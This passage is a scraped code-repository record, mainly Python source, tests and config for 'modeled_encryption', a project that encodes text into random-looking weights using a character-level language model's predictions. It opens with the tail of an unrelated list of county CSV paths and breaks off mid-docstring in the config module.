'inference_json2csv_by_county/estimated_beta_county_12019.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12021.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12023.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12027.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12029.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12031.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12033.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12035.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12037.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12039.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12041.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12043.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12045.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12047.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12049.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12051.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12053.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12055.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12057.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12059.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12061.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12063.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12065.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12067.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12069.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12071.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12073.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12075.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12077.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12079.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12081.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12083.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12085.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12086.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12087.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12089.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12091.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12093.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12095.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12097.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12099.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12101.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12103.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12105.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12107.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12109.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12111.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12113.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12115.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12117.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12119.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12121.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12123.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12125.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12127.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12129.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12131.csv',\n 'inference_json2csv_by_county/estimated_beta_county_12133.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12001.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12003.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12005.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12007.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12009.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12011.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12013.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12015.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12017.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12019.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12021.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12023.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12027.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12029.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12031.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12033.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12035.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12037.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12039.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12041.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12043.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12045.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12047.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12049.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12051.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12053.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12055.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12057.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12059.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12061.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12063.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12065.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12067.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12069.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12071.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12073.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12075.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12077.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12079.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12081.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12083.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12085.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12086.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12087.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12089.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12091.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12093.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12095.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12097.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12099.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12101.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12103.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12105.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12107.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12109.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12111.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12113.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12115.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12117.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12119.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12121.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12123.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12125.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12127.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12129.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12131.csv',\n 'inference_json2csv_by_county/summary_estimated_beta_county_12133.csv']\n\n return ret\n\n" } ]
83
stevekrenzel/modeled_encryption
https://github.com/stevekrenzel/modeled_encryption
c8e7749e00de04e5898f7eeac970c5dda8b2ef46
6740d0bebbbf42fa04528e885629e6726ec823da
7691706fce5480ff6cadcf89039d31dec758ab10
refs/heads/master
2021-04-29T11:26:53.779980
2017-01-04T07:41:01
2017-01-04T07:41:01
77,819,639
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6616825461387634, "alphanum_fraction": 0.668328046798706, "avg_line_length": 35.78333282470703, "blob_id": "6883a00058a74a579cff8b5bfd997ee409017488", "content_id": "5ec6a71be8be79863b54f11de77fd591e8097a29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6621, "license_type": "no_license", "max_line_length": 79, "num_lines": 180, "path": "/src/encoding.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from util.packing import unpack_ints, pack_ints\nfrom util.randoms import random_ints\nfrom util.lists import take, to_generator\nfrom util.modeling import tabulate, recite\nfrom util.padding import pad, unpad\n\ndef encode(model, text, block_size=16):\n \"\"\"Encodes a list of values into a list of approximately uniformly random\n weights as determined by the model's predictions for each value in\n `values`.\n\n The higher the model's prediction accuracy, the more uniformly random the\n output weights will be.\n\n The length of the encoded bytes will be a multiple of `block_size`.\n\n Example:\n >> decode(model, encode(model, \"foobar\", 16))\n \"FOOBAR \"\n\n Args:\n model (Model): The model to use for encoding. This should be trained on\n a domain related to `text`.\n\n text (string): The text to encode.\n\n block_size (int, optional): The output will be padded to be a multiple\n of `block_size`.\n\n Returns (bytes):\n A byte array containing the weights used to encode the text.\n\n Raises:\n ValueError: If `text` contains an item that isn't in the `model`'s\n alphabet.\n\n Exception: If padding the encoded plaintext fails. This is a\n non-deterministic process. The probability of this happening is\n highly unlikely, but not impossible. If your model has a boundary\n that occurs with a low-probability and you're getting this\n exception, increase your model's max_padding_trials attribute.\n \"\"\"\n randoms = random_ints() # Infinite stream of random ints\n (initial_weights, initial_sequence) = _initialize(model, randoms)\n\n transformed = list(model.transform(text))\n padded = pad(model, initial_sequence, transformed, block_size)\n encoded = tabulate(model, initial_sequence, padded)\n return pack_ints(initial_weights + list(encoded))\n\ndef decode(model, data):\n \"\"\"Decodes a byte array of weights into a string that is generated by\n using these weights to choose characters from a model's probability\n distribution.\n\n Example:\n >> decode(model, encode(model, \"foobar\", 16))\n \"FOOBAR \"\n\n Args:\n model (Model): The model that was used when encoding the provided data.\n\n data (bytes): The data containing the encoded weights to be used for\n decoding.\n\n Returns (string):\n The decoded string.\n \"\"\"\n randoms = to_generator(unpack_ints(data))\n (_, initial_sequence) = _initialize(model, randoms)\n\n decoded = recite(model, initial_sequence, randoms)\n unpadded = unpad(model, list(decoded))\n return ''.join(unpadded)\n\ndef _initialize(model, randoms):\n \"\"\"Given a model, returns the initial sequence to use for encoding, along\n with the weights that were used to generate that sequence.\n\n This initial sequence is generated after 1) normalizing the model and 2)\n priming the sequence.\n\n What does normalizing do?\n -------------------------\n\n The initial (seed) sequence in the model is entirely random\n (see: `_seed_sequence`), which results in the first few predictions of the\n model having a skewed disitribution that isn't representative of the\n underlying domain.\n\n What does priming do?\n ---------------------\n\n We want the initial sequence to be unique and representative of the\n underlying domain. We also want to start encoding after a boundary\n character. Priming generates a sequence and then chops off the suffix until\n a boundary is hit. This ensures that we don't start encoding with an\n initial sequence that end in the middle of a token.\n\n That is, if our priming step resulted in:\n\n \"ATTACK THE EASTERN FRO\"\n\n We'd return:\n\n \"ATTACK THE EASTERN \"\n\n If we didn't end on a boundary, as in the first example, then the model's\n predictions will be *really* skewed for the first few characters we encode.\n\n Example:\n >> from random import randint\n >> sequence_length = model.config.model.sequence_length\n >> normalizing_length = model.config.encoding.normalizing_length\n >> priming_length = model.config.encoding.priming_length\n >> length = sequence_length + normalizing_length + priming_length\n >> randoms = [randint(0, 2**32 - 1) for _ in range(length)]\n >>\n >> (weights, sequence) = _initialize(model, to_generator(randoms))\n >>\n >> \"\".join(sequence)\n 'ESPONSIBLE FOR PROVIDING THE READINESS ACTIVITIES '\n >> weights == list(randoms)\n True\n\n Args:\n model (Model): The model to use for generating the initial sequence.\n\n randoms (generator<int>): A generator that returns a sequence of\n 32-bit integers.\n\n Returns ((list(ints), list(char))):\n A tuple containing the list of weights used to generate the sequence,\n and the sequence itself.\n \"\"\"\n sequence_length = model.config.model.sequence_length\n normalizing_length = model.config.encoding.normalizing_length\n priming_length = model.config.encoding.priming_length\n\n seed = take(sequence_length, randoms)\n normals = take(normalizing_length, randoms)\n priming = take(priming_length, randoms)\n\n start = _seed_sequence(model, seed)\n primed = list(recite(model, start, normals + priming))\n unpadded = unpad(model, primed) # Removes any partial tokens at end\n return (seed + normals + priming, start + unpadded[-sequence_length:])\n\ndef _seed_sequence(model, seed):\n \"\"\"Generates a uniformly random sequence drawn from the model's alphabet.\n\n Note: If the length of the model's alphabet is not a power of 2 then there\n will be a small and neglible amount of skew towards earlier characters in\n the alphabet.\n\n This skew is bounded by:\n 1 + (1 / floor(2^32 / alphabet_length))\n\n That results in a maximum skew of 1.0000002 for a model with an alphabet\n of 1,000 or fewer characters.\n\n The randomness of this seed is not critical for security. That is, this\n function could return a fixed seed without impacting the security of the\n system.\n\n Example:\n >> from random import randint\n >> _seed_sequence(model, (randint(0, 2**32 - 1) for _ in range(10))\n ['R', 'U', 'B', 'S', 'T', 'K', '7', 'P', '5', 'A']\n\n Args:\n model (Model): The model that you're generating a seed for.\n\n seed (list(int)): The random 32-bit integers to use to generate the\n sequence.\n\n \"\"\"\n alphabet = model.config.model.alphabet\n alphabet_size = len(alphabet)\n return [alphabet[r % alphabet_size] for r in seed]\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6413043737411499, "avg_line_length": 25.63157844543457, "blob_id": "d61f404c69a3a02a186b997d4ac55565400e39e8", "content_id": "b663c07b21e457f059be35472083865522edaa7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1012, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/src/util/io.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from sys import stdout, stdin\nfrom getpass import getpass\n\ndef confirmed_get_pass(message, confirmation_message):\n \"\"\"Securely gets input from the console twice and confirms that they match.\n\n Args:\n message (string): The message to show to the user for the first request.\n\n confirmation_message (string:The message to show to the user for the\n second request.\n\n Returns:\n None if the inputs don't match, otherwise returns the input.\n \"\"\"\n input1 = getpass(message)\n input2 = getpass(confirmation_message)\n\n if input1 != input2:\n return None\n\n return input1\n\ndef read_file(filename):\n \"\"\"Reads the contents of a file. If the filename is None or '-', defaults\n to stdin.\n\n Args:\n filename (string): The filename to read.\n\n Returns:\n The contents of the file or stdin.\n \"\"\"\n if filename == '-' or filename == None:\n return stdin.read()\n else:\n with open(filename) as fin:\n return fin.read()\n" }, { "alpha_fraction": 0.5747508406639099, "alphanum_fraction": 0.5853820443153381, "avg_line_length": 30.795774459838867, "blob_id": "f139bd6277dd63feef61f5a7ea1ddcc4384f3f8d", "content_id": "85ad9b5a079a1f77b1fcfec10ec67ac8162bb8d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4515, "license_type": "no_license", "max_line_length": 89, "num_lines": 142, "path": "/src/util/sampling.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from random import SystemRandom\n\nRAND = SystemRandom()\n\ndef choose_choice(weight, choices, weights):\n \"\"\"This is just like a normal random weighted sample, but we provide the\n chosen weight instead of it being randomly generated.\n\n Given a list of items and associated weights, this returns the item\n associated with the provided `weight`.\n\n The weights are integer weights. Associating a weight of `N` with an item\n is equivalent to repeating it's corresponding item `N` times in a uniform\n sample. That is, given choices [\"A\", \"B\"] and weights [2, 3], this is\n equivalent to uniformly sampling [\"A\", \"A\", \"B\", \"B\", \"B\"] (but more memory\n efficient).\n\n Examples:\n >> choose_choice(0, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"A\"\n\n >> choose_choice(1, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"B\"\n\n >> choose_choice(2, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"B\"\n\n >> choose_choice(3, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"C\"\n\n >> choose_choice(4, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"C\"\n\n >> choose_choice(5, [\"A\", \"B\", \"C\"], [1, 2, 3])\n \"C\"\n\n Args:\n weight (int): A number >= 0 and < sum(weights). This is used\n to determine which element in the `choices` list to select.\n\n choices (list(x)): The list of items to choose from.\n\n weights (list(int)): The integer weights associated with each\n item in `choices`.\n\n Returns:\n The choice corresponding to the provided weight.\n\n Raises:\n ValueError: If `choices` and `weights` have different lengths.\n\n ValueError: If `weight` is less than zero or greater than sum(weights).\n \"\"\"\n if len(weights) != len(choices):\n raise ValueError(\"Weights has length %s, but choices has length %s.\"\n % (len(weights), len(choices)))\n\n if len(choices) == 0:\n raise ValueError(\"Can't have zero choices.\")\n\n if weight < 0:\n raise ValueError(\"Weight, %s, can not be less than zero.\" % (weight))\n\n total = 0\n for c, w in zip(choices, weights):\n total = total + w\n if weight < total:\n return c\n\n raise ValueError(\"Weight, %s, must be less than %s, the sum of all weights.\"\n % (weight, total))\n\ndef choose_weight(choice, choices, weights):\n \"\"\"This is the opposite of choose_choice. Given a choice, this generates a\n random weight corresponding to the provided choice. That is, choose_choice\n returns a choice given a weight, whereas choose_weight returns a weight for\n a provided choice.\n\n Each item in `choices` has a range of weights that corresponds to it. Given\n a specific `choice`, this returns a random weight from within that range.\n\n More explicitly, given:\n\n choice: \"B\"\n choices: [\"A\", \"B\"]\n weights: [2, 3]\n\n The corresponding weights for each choice are:\n\n choices: A, A, B, B, B\n weights: 0, 1, 2, 3, 4\n\n The end result is calling `choose_choice` with the weight returned from\n this function will always result in the `choice` passed into this function:\n\n >> weight = choose_weight(choice, choices, weights)\n >> sample = choose_choice(weight, choices, weights)\n >> sample == choice\n True\n\n Examples:\n This is deterministic because each choice has one valid weight:\n\n >> choose_weights(\"A\", [\"A\", \"B\", \"C\"], [1,1,1])\n 0\n\n This is non-deterministic:\n\n >> choose_weights(\"C\", [\"A\", \"B\", \"C\"], [1,2,3])\n 4\n\n Args:\n choice (x): The item to generate a weight for.\n\n choices (list(x)): The items being sampled from.\n\n weights (list(int)): The weights of each item in `choices`.\n\n Returns:\n A random weight from the interval corresponding to the given `choice`.\n Returns None if the choice has a weight of zero.\n\n Raises:\n ValueError: If the length of `choices` is not the same as the length of\n `weights`.\n \"\"\"\n if len(weights) != len(choices):\n raise ValueError(\"Weights has length %s, but choices has length %s.\"\n % (len(weights), len(choices)))\n\n start, end = 0, 0\n for c, w in zip(choices, weights):\n start, end = end, end + w\n if c == choice:\n break\n else:\n raise ValueError(\"Choice, %s, is not present in choices: %s\" % (choice, choices))\n\n if start == end:\n return None # When weight is zero\n\n return RAND.randint(start, end - 1)\n" }, { "alpha_fraction": 0.5461598038673401, "alphanum_fraction": 0.6027928590774536, "avg_line_length": 33.37333297729492, "blob_id": "94b408c28a233b1683e241529561c14885cefa96", "content_id": "62581fc62c15cd4b0c8044a99c1b62c3b729a1ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2578, "license_type": "no_license", "max_line_length": 104, "num_lines": 75, "path": "/src/util/math.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef log_normalize(values, temperature):\n \"\"\"Normalizes a list of values such that they sum to 1.0, while also\n skewing the distribution based off of `temperature` to amplify or suppress\n the impact of larger values.\n\n Large `temperature`s will cause the resultant values to be more\n uniform. Small `temperature`s will amplify the distances between values.\n\n Example:\n >> log_normalize([1, 1], 1.0)\n [0.5, 0.5]\n >> log_normalize([1, 2, 3], 1.0)\n [0.17, 0.33, 0.5]\n >> log_normalize([1, 2, 3], 3.0)\n [0.27, 0.34, 0.39]\n >> log_normalize([1, 2, 3], 0.25)\n [0.01, 0.16, 0.83]\n\n Args:\n values (list(num)): The list of values to normalize.\n\n temperature (float): The amount to skew the resultant distribution.\n\n Returns (numpy.array):\n A normalizes list of values.\n \"\"\"\n preds = np.asarray(values).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n return preds.ravel()\n\ndef scale(values, total, lowest=0):\n \"\"\"Takes a list of values that sum to 1.0 and scales them to integer values\n that sum to `total`, while maintaining their relative ratios. Due to\n rounding, the ratios may change slightly. The impact of this can be\n minimized by choosing a large value for `total`.\n\n The `lowest` argument puts a floor on the smallest element that will be in\n the resultant list. If this value is non-zero, it ensures that small values\n will still have weight in the resultant list.\n\n Example:\n >> scale([0.5, 0.5], 10)\n [5, 5]\n >> scale([0.0, 0.5], 10)\n [0, 10]\n >> scale([0.0, 0.5], 10, 1)\n [1, 9]\n >> scale([0.05, 0.2, 0.75], 100)\n [5, 20, 75]\n >> scale([0.005, 0.245, 0.75], 100) # Without `lowest` set, 0.005 gets zero weight in the result\n [0, 24, 76]\n >> scale([0.005, 0.245, 0.75], 100, 1) # With `lowest` set, 0.005 now gets some weight\n [1, 24, 75]\n\n Args:\n values (list(float)): The list of values to scale.\n\n total (int): The value that the scaled list will sum to.\n\n lowest (int, optional): The lowest value allowed in the resultant list.\n\n Returns (list(int)):\n A list that is scaled to sum to `total`.\n \"\"\"\n scaled = [int(max(lowest, round(p * total))) for p in values]\n\n delta = total - sum(scaled)\n max_index = max(range(len(scaled)), key=lambda i: scaled[i])\n scaled[max_index] += delta\n\n return scaled\n" }, { "alpha_fraction": 0.5417066216468811, "alphanum_fraction": 0.5848513841629028, "avg_line_length": 22.704545974731445, "blob_id": "054a4712fb505a0c26d2fd784133e418de422c22", "content_id": "84cbf221ef1d38158ffe05b733092e41386db79a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 63, "num_lines": 44, "path": "/src/util/packing.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from struct import pack, unpack, calcsize\n\nBITS_IN_BYTE = 8\nBYTES_IN_INT = calcsize('I')\nINT_SIZE = BYTES_IN_INT * BITS_IN_BYTE\nMAX_INT = (2**INT_SIZE) - 1\n\ndef pack_ints(xs):\n \"\"\"Serializes a list of 32-bit integers into a byte string.\n\n Example:\n >> pack_ints([1, 2, 3])\n b'\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\\x00'\n\n Args:\n xs (list(int)): The list of integers to encode.\n\n Returns:\n A byte string encoding the list of integers.\n\n Raises:\n Error: If `xs` does not contain integers.\n\n Error: If a value is not 0 <= x < 2^32.\n \"\"\"\n return pack('I' * len(xs), *xs)\n\ndef unpack_ints(data):\n \"\"\"Deserializes a byte string into 32-bit integers.\n\n Example:\n >> unpack_ints(pack_ints([1,2,3]))\n (1, 2, 3)\n\n Args:\n data (bytes): The bytes to deserialize.\n\n Returns:\n A tuple of the decoded integers.\n\n Raises:\n Error: If the data length is not a multiple of 4.\n \"\"\"\n return unpack('I' * (len(data) // BYTES_IN_INT), data)\n" }, { "alpha_fraction": 0.6772727370262146, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 23.44444465637207, "blob_id": "a3f56c4a848780066a26ae664048a0660d9387f4", "content_id": "dd4bcdb2f54eace72ee3ba67dede6f974f30cb20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 60, "num_lines": 9, "path": "/src/util/randoms.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from random import SystemRandom\nfrom .packing import MAX_INT\n\nRAND = SystemRandom()\n\ndef random_ints():\n \"\"\" Generates an infinite stream of 32-bit integers. \"\"\"\n while True:\n yield RAND.randint(0, MAX_INT)\n" }, { "alpha_fraction": 0.46011754870414734, "alphanum_fraction": 0.5365239381790161, "avg_line_length": 41.53571319580078, "blob_id": "d5fa00cedf7f9f0b4d90834e0375617a9c11f26c", "content_id": "12d23c712fc929f1459b075db9fe96f99b702156", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 66, "num_lines": 28, "path": "/tests/util/lists_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.lists import rfind, drop_tail_until, take\n\nclass TestLists(unittest.TestCase):\n\n def test_rfind(self):\n self.assertEqual(rfind(None, []), None)\n self.assertEqual(rfind(1, [1, 2, 3, 1, 2, 3]), 3)\n self.assertEqual(rfind(2, [1, 2, 3, 1, 2, 3]), 4)\n self.assertEqual(rfind(3, [1, 2, 3, 1, 2, 3]), 5)\n self.assertEqual(rfind(4, [1, 2, 3, 1, 2, 3]), None)\n\n def test_drop_tail_until(self):\n self.assertEqual(drop_tail_until(None, []), [])\n self.assertEqual(drop_tail_until(0, [1, 2, 3]), [1, 2, 3])\n self.assertEqual(drop_tail_until(1, [1, 2, 3]), [1])\n self.assertEqual(drop_tail_until(2, [1, 2, 3]), [1, 2])\n self.assertEqual(drop_tail_until(3, [1, 2, 3]), [1, 2, 3])\n\n def test_take(self):\n self.assertEqual(take(0, []), [])\n self.assertEqual(take(1, []), [])\n self.assertEqual(take(0, [1, 2, 3]), [])\n self.assertEqual(take(1, [1, 2, 3]), [1])\n self.assertEqual(take(2, [1, 2, 3]), [1, 2])\n self.assertEqual(take(3, [1, 2, 3]), [1, 2, 3])\n self.assertEqual(take(4, [1, 2, 3]), [1, 2, 3])\n self.assertEqual(take(-1, [1, 2, 3]), [])\n" }, { "alpha_fraction": 0.6271186470985413, "alphanum_fraction": 0.6384180784225464, "avg_line_length": 35.875, "blob_id": "09c5a788a412a2ce7678928a72426b34ecb030b6", "content_id": "16f2b4c2ae84023eced5244b3518d292a257de1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 91, "num_lines": 24, "path": "/tests/encoding_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom encoding import encode, decode\nfrom mock_model import mock_model\n\nclass TestEncoding(unittest.TestCase):\n\n def test_encoding(self):\n \"\"\" Test round-trip encoding.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n # If message doesn't end in boundary, it should be appended.\n self.assertEqual(decode(model, encode(model, \"\")), \"0\")\n self.assertEqual(decode(model, encode(model, \"0\")), \"0\")\n self.assertEqual(decode(model, encode(model, \"1\")), \"10\")\n\n # Test a bunch of random messges of varying lengths\n for i in range(30):\n message = \"\".join(choice(\"01\") for _ in range(i)) + model.config.model.boundary\n result = decode(model, encode(model, message))\n self.assertEqual(message, result)\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6571428775787354, "avg_line_length": 22.33333396911621, "blob_id": "2533dedf5f70ebca15e2d8f8ec6d4dc04e34e8b1", "content_id": "b39eb0ec5644ed0f6234e30b2bda0bc813ec88f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 70, "license_type": "no_license", "max_line_length": 32, "num_lines": 3, "path": "/menc", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Run ./menc for list of options\npython3 src/main.py \"$@\"\n" }, { "alpha_fraction": 0.6708920001983643, "alphanum_fraction": 0.6719874739646912, "avg_line_length": 30.950000762939453, "blob_id": "a2220466ddb904f0b245ff93b927252bc83904e6", "content_id": "353ef69d674c3dc6134111e196bb237389580c06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6390, "license_type": "no_license", "max_line_length": 101, "num_lines": 200, "path": "/src/config.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "\"\"\" Handles loading / parsing config files. \"\"\"\n# XXX - This impl stretches namedtuples a little far, doesn't do type\n# validation on values, and gives a shitty / not very helpful error message\n# when a field is missing. This can all be improved.\n\nimport json\nfrom os.path import join, normpath, dirname\nfrom collections import namedtuple\n\nModelConfig = namedtuple('ModelConfig', [\n# Configuration values related to the composition of the model.\n\n 'alphabet',\n # A string containing the entire alphabet of the model.\n\n 'nodes',\n # The number of nodes in the hidden layer of the the LSTM.\n\n 'sequence_length',\n # The length of the input sequence to the model.\n\n 'boundary',\n # The delimiting character between tokens in the model. (e.g. ' ' for a\n # model that generates words, or '.' for a model that generates sentences)\n\n 'weights_file',\n # The path to the file containing the model's weights. When training, the\n # weights will be stored here.\n])\n\nEncodingConfig = namedtuple('EncodingConfig', [\n# Configuration values for encoding sequences.\n\n 'normalizing_length',\n # The number of characters to run through a randomized model to normalize\n # it's output distribution.\n\n 'priming_length',\n # The number of characters to generate to create an initial sequence for\n # encoding.\n\n 'max_padding_trials',\n # The maximum number of times to try adding padding before giving up.\n\n 'padding_novelty_growth_rate',\n # A float representing the increase in novelty after each failed attempt at\n # padding. We increase the novelty slightly after each failure in an attempt\n # to increase the odds of generating padding of a valid length while\n # minimizing the skew to the model's output distribution.\n\n 'novelty',\n # The novelty (a.k.a. temperature) to use when normalizing prediction\n # weights. A smaller number will make the predictions more conservative.\n])\n\nTrainingConfig = namedtuple('TrainingConfig', [\n# Configuration values for training the model.\n\n 'validation_split',\n # The percentage of data to be withheld for validation suring training.\n\n 'batch_size',\n # The size of batches during 